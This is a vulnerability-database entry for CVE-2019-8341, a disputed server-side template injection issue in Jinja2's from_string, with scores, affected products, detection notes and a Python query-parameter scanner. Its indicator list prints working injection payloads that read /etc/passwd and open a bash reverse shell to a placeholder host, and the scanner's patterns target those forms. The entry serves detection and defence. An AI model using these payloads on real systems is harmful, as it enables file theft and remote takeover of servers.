CVE-2019-8341
published 2019-02-15


Priority: P2 · 75 · critical
CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 44.78% (98.6th percentile)
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing.

Affected

4 ranges
Vendor    Product  Version range  Fixed in
debian    jinja2
opensuse  leap
opensuse  leap
pocoo     jinja2

Detection & IOCs (extracted from sources)

url: http://localhost:4444/?username={{4*4}}
url: http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
url: http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}
command: bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1
  • Detect SSTI payloads in HTTP query parameters by looking for Jinja2 template expression delimiters {{ }} in URI/request values, particularly in parameters like 'username'.
  • Monitor for Python MRO/subclass traversal patterns in HTTP parameters indicative of SSTI exploitation: ''.__class__.__mro__[2].__subclasses__()[40]
  • Detect reverse shell attempts via Jinja2 SSTI using config['RUNCMD'] with bash TCP redirection in template injection payloads.
  • Flag use of Jinja2.from_string() where the 'source' parameter is derived from user-controlled input (e.g., request.values.get()) without sandboxing — this is the vulnerable code pattern.
  • This CVE is disputed by the Jinja2 maintainers and multiple vendors (Red Hat, Pallets project). The behavior is considered expected/by-design: Jinja2 does not guarantee safe handling of untrusted templates without sandboxing enabled. No patch exists or is planned.
  • Red Hat explicitly assessed all their products as 'Not affected' and considers the CVE assignment invalid.
  • Jinja2 maintainers submitted a REJECT request to MITRE; the CVE status is disputed. Detection rules targeting this CVE should be scoped to application-level misuse, not a framework vulnerability.
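
The query-parameter checks in the detection notes above, as an added example (not code from the CVE record or from the Jinja2 project): a standard-library Python function that decodes each parameter, including a second decoding pass for double-encoded values, and reports which patterns matched. The rule names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Rule names are this example's own; the patterns come from the notes above.
RULES = {
    "jinja2_delimiters": re.compile(r"\{\{.*?\}\}", re.S),
    "python_object_traversal": re.compile(r"__(?:class|mro|subclasses)__"),
    "bash_tcp_redirect": re.compile(r"/dev/tcp/"),
}


def scan_request(url: str) -> dict[str, list[str]]:
    """Return {parameter name: sorted rule names that matched its value}."""
    findings: dict[str, set[str]] = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # parse_qsl decoded the value once; decode again so a double-encoded
        # value (%257B%257B...) is inspected in the form a second decoder sees.
        forms = {value, unquote_plus(value)}
        for rule, pattern in RULES.items():
            if any(pattern.search(form) for form in forms):
                findings.setdefault(name, set()).add(rule)
    return {name: sorted(rules) for name, rules in findings.items()}


# Constructed sample requests (not taken from real traffic).
SAMPLE_REQUESTS = [
    "/?username=alice",
    "/?username=%7B%7B4*4%7D%7D",
    "/?username=%257B%257B4*4%257D%257D",
    "/?lang=en&username=%7B%7B''.__class__.__mro__%7D%7D",
    "/?note=unclosed+%7B%7B+brace",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request, "->", scan_request(request) or "clean")
```

A match shows that a request carried template syntax, not that the application rendered it; pair the alert with a code review for from_string() calls fed from request data.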

CVSS provenance

nvd            v3.1  9.8  CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd            v2.0  7.5  HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
osv                  9.8  CRITICAL
vendor_debian        9.8  LOW
vendor_redhat        9.8  CRITICAL